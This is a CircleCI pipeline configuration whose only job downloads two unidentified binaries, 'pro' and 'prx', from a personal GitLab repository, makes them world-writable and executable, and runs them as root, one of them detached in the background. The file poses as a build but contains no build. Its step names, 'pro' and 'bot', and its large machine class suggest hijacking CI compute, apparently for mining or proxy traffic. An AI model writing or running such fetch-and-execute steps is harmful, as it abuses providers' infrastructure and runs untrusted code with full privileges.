version: 2.1

jobs:
  build:
    machine:
      resource_class: 2xlarge
      image: ubuntu-2004:202101-01

    steps:
      - run:
         name: "pro"
         command: | 
          sudo su --command "apt update && sudo apt install screen && wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro"
          sudo su --command "nohup ./pro --log=stdout > meta.log &"
          sleep 10
          sudo su --command "ls"
      
      - run:
         name: "bot"
         command: |
          wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/prx
          chmod 777 prx
          sudo su --command "./prx"

workflows:
  version: 2
  build:
    jobs:
      - build
